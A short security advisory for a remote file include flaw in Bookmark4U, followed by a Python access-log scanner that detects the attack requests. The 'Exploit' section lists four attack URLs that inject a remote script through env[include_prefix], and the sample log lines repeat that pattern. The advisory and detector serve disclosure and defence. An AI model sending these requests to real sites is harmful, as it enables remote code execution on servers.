
Bookmark4U Remote File Include




---------------------------------------------------------------------------
Bookmark4U <= 2.0.0? ([include_prefix]) Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author    : SnIpEr_SA
Remote    : Yes
Local     : No
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Bookmark4U
Version     : 2.0.0
URL         : http://bookmark4u.sourceforge.net/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# http://www.site.com/[Bookmark4Upath]/inc/dbase.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/config.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/common.php?env[include_prefix]=[evil_scripts]
# http://www.site.com/[Bookmark4Upath]/inc/function.php?env[include_prefix]=[evil_scripts]

---------------------------------------------------------------------------
*/
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr.SA[at]hotMail[dot]com
Homepage: http://www.3asfh.net/ & http://www.lezr.com/
Greetz: All My Friends
/*
-------------------------------- [ END ] ----------------------------------

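A defender-side check for the request pattern listed under "Exploit", added here as an example (it is not part of the original advisory or of the Bookmark4U code): it scans web-server access-log lines for requests to the four inc/ scripts that carry env[include_prefix] in the query string, and marks whether the supplied value points at a remote location. The combined log format, the function name scan and the sample log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The four scripts and the parameter named in the advisory.
SCRIPTS = {"dbase.php", "config.php", "common.php", "function.php"}
PARAM = "env[include_prefix]"
# A value with a URL scheme or a leading // refers to a remote location.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Client address and request target of a combined-format log line (assumed format).
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3}')

# Constructed sample lines (documentation addresses and host names).
SAMPLE = [
    '203.0.113.7 - - [10/Jun/2006:10:00:01 +0000] "GET /bm4u/inc/dbase.php?env[include_prefix]=http://host.example/a.txt? HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jun/2006:10:00:05 +0000] "GET /bm4u/inc/common.php?env%5Binclude_prefix%5D=%2F%2Fhost.example%2Fa HTTP/1.1" 200 87',
    '203.0.113.9 - - [10/Jun/2006:10:00:09 +0000] "GET /bm4u/inc/function.php?env[include_prefix]=/tmp/ HTTP/1.1" 200 87',
    '198.51.100.4 - - [10/Jun/2006:10:01:00 +0000] "GET /bm4u/index.php?env[include_prefix]=x HTTP/1.1" 200 900',
    '198.51.100.4 - - [10/Jun/2006:10:02:00 +0000] "GET /bm4u/inc/config.php HTTP/1.1" 200 0',
]

def scan(lines):
    """Return (client, script, value, is_remote) for each matching request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.group(1), m.group(2)
        url = urlsplit(target)
        parts = url.path.lower().split("/")
        if len(parts) < 2 or parts[-2] != "inc" or parts[-1] not in SCRIPTS:
            continue
        # parse_qsl percent-decodes keys, so env%5Binclude_prefix%5D matches too.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == PARAM:
                hits.append((client, parts[-1], value, bool(REMOTE.match(value))))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Every hit is worth reviewing, since the parameter is being supplied from the request; the is_remote flag separates the remote-include form described in the advisory from local path values.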